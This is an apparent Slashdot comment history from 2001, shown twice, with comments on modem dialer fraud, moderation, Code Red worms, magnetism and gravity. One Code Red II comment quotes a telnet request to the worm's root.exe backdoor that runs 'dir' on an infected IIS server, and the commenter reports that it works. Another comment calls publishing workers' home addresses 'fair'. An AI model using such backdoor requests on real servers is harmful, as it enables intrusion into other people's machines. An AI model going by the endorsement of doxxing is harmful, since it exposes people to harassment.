Re:hmm.. there IS an area where modems are preferr
on
Stopping The 56K Hate
·
· Score: 2
> and once again.. it's porn. Certain porn-sites use a 'plugin' that basically makes your modem call a commercial dialin point owned by the porn-server. This makes for easy billing.
... and this is often done without warning the user, and after switching the modem to ATM0L0.
And most people spell this F R A U D.
Re:M*derators!
on
Code Red III
·
· Score: 1, Offtopic
> Why is that moderated to 0, Troll? That was both funny as hell, and a good idea!
Your post seems to have been moderated down as well. This seems to happen very often with posts discussing moderation. It's so common, it's almost caricatural: apparently some moderators can't stand it if you question their moderation skills. If anybody from the Slashdot crew is reading this, may I propose the following safeguard against such moderation abuses:
If a post has moderator (case insensitive) in the title, and...
... a moderator has already moderated any direct or indirect parent of said post...
... then the same moderator cannot moderate this post.
It would be relatively safe against abuse (for example, just putting moderators in the title of posts linking to a certain well-known site on the Christmas Islands...) as all the other moderators could still mod it down. Only the moderators who have modded down or up one of the parents would be barred.
As an addition, we could remove Offtopic from the moderation menu for any "moderators" post. Although discussion about moderation is not, strictly speaking, on topic, I think these meta-discussions are still justified. You would still be able to moderate them down as Flamebait or Troll, just not as Offtopic (as long of course, as you didn't mod a parent).
> To view the image, click on the link and then add a ? to the end of the URL. (If you're using Mozilla, pressing enter in the location bar is sufficient.)
... and if you use Konqueror, just clicking on the link is enough! D'oh.
Re:notoriously buggy?
on
Netscape 6.1
·
· Score: 2
> What about the articles that you couldn't read that they chose not to run?
Or articles that you couldn't read because they conveniently forgot to close a <table> tag...
> If 99.9% of all security problems are redhat, then the Code Red II worm is only 0.1%. So, you multiply the code red worms by 1000, that is the number of unsecured redhat boxes, clearly a realistic number.
Good for us. Let's also assume that half of the Red Hat installations have a security problem (which, given Linux' security is clearly an exageration). This would mean that we have at least (assuming 140000 Code Red boxes at the peak, according to Caida):
140000*1000*2 = 280000000 Linux boxes out there!
And that's even taking an extra-ordinarily high ratio of vulnerability. If we take a more realistic ratio of 1% of RHAT boxes being vulnerable, we get:
140000*1000*100 = 14000000000 Linux boxen!
Now how's that for popularity? These are more than people on earth (including Third World countries where most cannot even afford a computer...), and some have the gall to claim that Linux' market penetration is negligible!
> When the highway patrol asks "vere are yo pa-pahs?" the address on your registration best match the address on your license. Otherwise alarm bells go off in the officer's head.
And the color of your car better matches the color in the registration too. And no, dark grey is not the same as black, even if they look very similar to the casual observer...
> Best of all, no one can "see" the attack on the camera as it happens.
What if the cameras are set up to send their video to a central location, and the last car they show is always your non-computerized 74 pickup truck?
This reminds of some computing event I once helped to organize. Schools would come with their PC'es to demo their pet projects, and at the off times, all the PCs were used as a cybercafe. One of the PC was fitted with a webcam, pointing right at the guy using it (it had some other fun stuff too). One evening, we found that particular PC to be powered off (without a proper shutdown...), and the next day the culprit's mugshot was all over the show's website!
> Sure, that's easy to say now, but not 200 years ago. 200 years ago, a lodestone was *the* magnet. It was a piece of rock that attracted iron filings.
> A couple of weeks ago while I was out at a wrecking yard digging up parts for one of my cool old cars, I watched an electromagnet lifting cars. That's a lot of iron filings.
> Similarly, 200 years ago, an ebony rod attracted grains of pepper. Now, we harness electrostatic attraction and replusion for all sorts of things, ranging from TV sets and computer monitors to Van de Graaf generators which power linear accelerators at nuclear research facilities.
Yes, but the important difference between weakness of magnetism 200 years ago, and weakness of gravity right now is the reason why such weakness was observed.
Your ebony rod is so weakly electified because although it comprises an impressive number of charges, most balance out (there are positive and negative charges which cancel each other's effect out). Net electric charge is only caused by an imbalance between positive and negative, and this imbalance is incredibly low: maybe only one electron per atom, and only on the surface. ALthough the mass of the object may be high, only a tiny part of that mass contributes to the effect. And during the last 200 years, we've just been getting better at augmenting the proportion of the mass that has an effect.
Magnetism involves movement of charges. In case of natural magnetism, this is the (non-cancelled) movement of electron around the atom's nucleus. In most materials, this cancels out because:
if the atom has an even number of electrons, half go one way, and the other half go the other (this is much simplified, in reality quantum mechanics come into play and complicates this simple matters much)
if an even number of electrons is present, each atom may have a tiny magnetic field, but differently oriented atoms cause cancellation
Today, the strongest magnets are, as you correctly pointed out, electromagnets. In those we have a macroscopic movement of charges (i.e. electric current), which we can theoretically make as high as we wish (as permitted by the electrical resistence of the material and electric power at our disposal...)
Gravity is different though: there are no "negative" gravity particle which could cancel out the normal positive gravity, or at least there are none known today. Weakness of gravity thus does not come from cancellation, but is rather inherent in the force itself! The active principle in gravity is mass, and the only way to get "better" gravity is indeed to augment the mass. Moreover, unlike magnetism, gravity is not tied to movement, thus we cannot manipulate it either by speeding up the objects (at least not until we reach relativistic speeds).
> Consider that, to my knowledge, we've still got no higher understanding of why two positively charged ions repel, or why a positively charged ion attracts a negatively charged ion. Nor do we really understand anything more about magnetism's lines of force than the pretty little lines of iron filings on the paper when we rest it over a bar magnet. Like gravity, they're fundamental forces. We know a little bit about how to use them - the variables involved. Mass, materials which maintain an electrostatic charge well, and ferrous metals. We know they're inter-related. But how do the forces themselves work?
We may not know the philosophical reason why magnetism and electricity exists at all, but we have a pretty detailed understanding however how they interact (Maxwell equations), why the electric/magnetic field is shaped the way it is, how those forces propagate, etc.
> With our present knowledge, we're at about the level of proficiency of a secretary who is good with Excel and yet still refers to her computer as a "hard drive". We can make two of these forces do the things we want them to do, but we don't have any higher knowledge of how they work.
Our knowledge of magnetism/electricity may not be complete enough to satisfy a philosopher, but it is certainly complete enough for an engineer, and well beyond that of your Windows toting secretary knowing nothing else than Excel.
Nobody forced them to chose this job, there are enough other openings in the industry. By chosing to work for this corrupt system, they share a part of the responsibility, even if they are "only following orders". Publishing names (and home addresses, if possible) is fair.
...and then your manager tells you "whenever I come to your office for a quick & innocent question I see a Slashdot window on your screen. That certainly doesn't help with meeting the deadlines..."
> It hardly takes a scientist to notice that, after you have hung up, you actually spend some time thinking "now, what was it I was doing?"
True. But how much time does it take you? 15 minutes, or more like 1 or 2 minutes?
I'd guess for most kinds of tasks, and most interruptions, it'd more like a couple of minutes, rather than a quarter of an hour...
Unless of course the interruption puts you off so much that you go into a Slashdot reading spree before getting back to work...
> It is on or near this day that Microsoft's software became, without a doubt, a public nuisance to the internet.
I hate to defend Micro$oft, but at least in this instance, they are only a nuisance to themselves (and to their customers). Indeed, Code Red only infects IIS, not Apache nor any of the many other brands of Webservers. And please don't bring out that old canard of CodeRed eating bandwidth and bringing the Internet to a crawl: this one has been debunked here:
the real reason for the July 10th slowdown was... a train wreck!
For obvious reasons, the worm is programmed to ignore the 127.0.0.1 netinterface. However, all other interfaces, even 192.168., and 10. are fair game: the reasoning here is that scanning those will allow the worm to infect machines behind NAT routers.
Actually, root.exe is just a copy of cmd.exe, as can be seeing by running a dir on c:\winnt\system32\cmd.exe. The different sizes of cmd.exe probably just mean that this is a slightly different version (service pack) of windows, that's all.
Actually, the three variants of the initial worms (1 with broken random number generator, 2 with a fixed one) can be considered roughly the same release. Indeed, apart from the obvious fixes, most code was rigourously identical. So, let's call those 1.0, 1.1 and 1.2. However this one is entirely different, apart from the exploit it uses, and the name CodeRedII. Thus the use of version 2.0 does seem to be justfied.
> telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET/scripts/root.exe?/c+dir HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 09:35:11 GMT
Content-Type: application/octet-stream
Volume in drive D has no label.
Volume Serial Number is A8A2-CE97
Wow, this does indeed work! But where do you get from there? Typing dir at the prompt seems to
do nothing at all. Even using GET/scripts/root.exe?dir HTTP/1.0 does not work as expected.
Just tried it. The question I asked was "will code red ii sink microsoft". The answer was... guess what...no, not that one, we're talking about Code Red here, not Sircam.
Slashdot Mirror
... and this is often done without warning the user, and after switching the modem to ATM0L0.
And most people spell this F R A U D.
Your post seems to have been moderated down as well. This seems to happen very often with posts discussing moderation. It's so common, it's almost caricatural: apparently some moderators can't stand it if you question their moderation skills. If anybody from the Slashdot crew is reading this, may I propose the following safeguard against such moderation abuses:
- If a post has moderator (case insensitive) in the title, and...
- ... a moderator has already moderated any direct or indirect parent of said post...
- ... then the same moderator cannot moderate this post.
It would be relatively safe against abuse (for example, just putting moderators in the title of posts linking to a certain well-known site on the Christmas Islands...) as all the other moderators could still mod it down. Only the moderators who have modded down or up one of the parents would be barred.As an addition, we could remove Offtopic from the moderation menu for any "moderators" post. Although discussion about moderation is not, strictly speaking, on topic, I think these meta-discussions are still justified. You would still be able to moderate them down as Flamebait or Troll, just not as Offtopic (as long of course, as you didn't mod a parent).
And I though it was supposed to be a chicken head in a box of Chicken Mc Nuggets...
Or articles that you couldn't read because they conveniently forgot to close a <table> tag...
Good for us. Let's also assume that half of the Red Hat installations have a security problem (which, given Linux' security is clearly an exageration). This would mean that we have at least (assuming 140000 Code Red boxes at the peak, according to Caida):
140000*1000*2 = 280000000 Linux boxes out there!
And that's even taking an extra-ordinarily high ratio of vulnerability. If we take a more realistic ratio of 1% of RHAT boxes being vulnerable, we get:
140000*1000*100 = 14000000000 Linux boxen!
Now how's that for popularity? These are more than people on earth (including Third World countries where most cannot even afford a computer...), and some have the gall to claim that Linux' market penetration is negligible!
How can this possibly be anything other than flamebait or troll? Especially when posted to a story about a vulnerability/worm in a Micro$oft OS!
Ok, I've got some karma to burn, so go ahead, and take me three points!
Hey, cable (and DSL) is way faster than ISDN. So do you mean I have to chose between fast connectivity, and non-anal service, but can't have both?
> T1, or something faster put into your basement.
Yeah, pony up the cash, indeed.
And the color of your car better matches the color in the registration too. And no, dark grey is not the same as black, even if they look very similar to the casual observer...
What if the cameras are set up to send their video to a central location, and the last car they show is always your non-computerized 74 pickup truck?
This reminds of some computing event I once helped to organize. Schools would come with their PC'es to demo their pet projects, and at the off times, all the PCs were used as a cybercafe. One of the PC was fitted with a webcam, pointing right at the guy using it (it had some other fun stuff too). One evening, we found that particular PC to be powered off (without a proper shutdown...), and the next day the culprit's mugshot was all over the show's website!
Not at all, until they are foolish enough to set foot into the US, for a conference for example...
... I've some Karma to burn, so here it goes anyways: More informative than Slashdot
> A couple of weeks ago while I was out at a wrecking yard digging up parts for one of my cool old cars, I watched an electromagnet lifting cars. That's a lot of iron filings.
> Similarly, 200 years ago, an ebony rod attracted grains of pepper. Now, we harness electrostatic attraction and replusion for all sorts of things, ranging from TV sets and computer monitors to Van de Graaf generators which power linear accelerators at nuclear research facilities.
Yes, but the important difference between weakness of magnetism 200 years ago, and weakness of gravity right now is the reason why such weakness was observed.
Your ebony rod is so weakly electified because although it comprises an impressive number of charges, most balance out (there are positive and negative charges which cancel each other's effect out). Net electric charge is only caused by an imbalance between positive and negative, and this imbalance is incredibly low: maybe only one electron per atom, and only on the surface. ALthough the mass of the object may be high, only a tiny part of that mass contributes to the effect. And during the last 200 years, we've just been getting better at augmenting the proportion of the mass that has an effect.
Magnetism involves movement of charges. In case of natural magnetism, this is the (non-cancelled) movement of electron around the atom's nucleus. In most materials, this cancels out because:
Today, the strongest magnets are, as you correctly pointed out, electromagnets. In those we have a macroscopic movement of charges (i.e. electric current), which we can theoretically make as high as we wish (as permitted by the electrical resistence of the material and electric power at our disposal...)
Gravity is different though: there are no "negative" gravity particle which could cancel out the normal positive gravity, or at least there are none known today. Weakness of gravity thus does not come from cancellation, but is rather inherent in the force itself! The active principle in gravity is mass, and the only way to get "better" gravity is indeed to augment the mass. Moreover, unlike magnetism, gravity is not tied to movement, thus we cannot manipulate it either by speeding up the objects (at least not until we reach relativistic speeds).
> Consider that, to my knowledge, we've still got no higher understanding of why two positively charged ions repel, or why a positively charged ion attracts a negatively charged ion. Nor do we really understand anything more about magnetism's lines of force than the pretty little lines of iron filings on the paper when we rest it over a bar magnet. Like gravity, they're fundamental forces. We know a little bit about how to use them - the variables involved. Mass, materials which maintain an electrostatic charge well, and ferrous metals. We know they're inter-related. But how do the forces themselves work?
We may not know the philosophical reason why magnetism and electricity exists at all, but we have a pretty detailed understanding however how they interact (Maxwell equations), why the electric/magnetic field is shaped the way it is, how those forces propagate, etc.
> With our present knowledge, we're at about the level of proficiency of a secretary who is good with Excel and yet still refers to her computer as a "hard drive". We can make two of these forces do the things we want them to do, but we don't have any higher knowledge of how they work.
Our knowledge of magnetism/electricity may not be complete enough to satisfy a philosopher, but it is certainly complete enough for an engineer, and well beyond that of your Windows toting secretary knowing nothing else than Excel.
Especially with the imminent block against an XP release is everything. Make the government lose a couple of days, and XP will be out of the door...
Nobody forced them to chose this job, there are enough other openings in the industry. By chosing to work for this corrupt system, they share a part of the responsibility, even if they are "only following orders". Publishing names (and home addresses, if possible) is fair.
...and then your manager tells you "whenever I come to your office for a quick & innocent question I see a Slashdot window on your screen. That certainly doesn't help with meeting the deadlines..."
True. But how much time does it take you? 15 minutes, or more like 1 or 2 minutes? I'd guess for most kinds of tasks, and most interruptions, it'd more like a couple of minutes, rather than a quarter of an hour... Unless of course the interruption puts you off so much that you go into a Slashdot reading spree before getting back to work...
I hate to defend Micro$oft, but at least in this instance, they are only a nuisance to themselves (and to their customers). Indeed, Code Red only infects IIS, not Apache nor any of the many other brands of Webservers. And please don't bring out that old canard of CodeRed eating bandwidth and bringing the Internet to a crawl: this one has been debunked here: the real reason for the July 10th slowdown was... a train wreck!
For obvious reasons, the worm is programmed to ignore the 127.0.0.1 netinterface. However, all other interfaces, even 192.168., and 10. are fair game: the reasoning here is that scanning those will allow the worm to infect machines behind NAT routers.
Actually, root.exe is just a copy of cmd.exe, as can be seeing by running a dir on c:\winnt\system32\cmd.exe. The different sizes of cmd.exe probably just mean that this is a slightly different version (service pack) of windows, that's all.
Actually, the three variants of the initial worms (1 with broken random number generator, 2 with a fixed one) can be considered roughly the same release. Indeed, apart from the obvious fixes, most code was rigourously identical. So, let's call those 1.0, 1.1 and 1.2. However this one is entirely different, apart from the exploit it uses, and the name CodeRedII. Thus the use of version 2.0 does seem to be justfied.
> telnet x.x.x.x 80 /scripts/root.exe?/c+dir HTTP/1.0
. ..
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 09:35:11 GMT
Content-Type: application/octet-stream
Volume in drive D has no label.
Volume Serial Number is A8A2-CE97
Directory of d:\inetpub\scripts
2001-06-03 04:12a <DIR>
2001-06-03 04:12a <DIR>
2001-06-13 09:07a 289 default.asp
2001-06-13 09:07a 289 default.htm
2001-06-13 09:07a 289 index.asp
2001-06-13 09:07a 289 index.htm
2000-01-10 09:00p 310,544 root.exe
5 File(s) 311,700 bytes
2 Dir(s) 353,468,416 bytes free
Connection closed by foreign host.
Wow, this does indeed work! But where do you get from there? Typing dir at the prompt seems to do nothing at all. Even using GET /scripts/root.exe?dir HTTP/1.0 does not work as expected.
Who known, maybe now is the time to buy again some RHAT stock... Indeed, people will need another OS once they've thrown out MShit.
Just tried it. The question I asked was "will code red ii sink microsoft". The answer was... guess what...no, not that one, we're talking about Code Red here, not Sircam.
It was: "Most likely".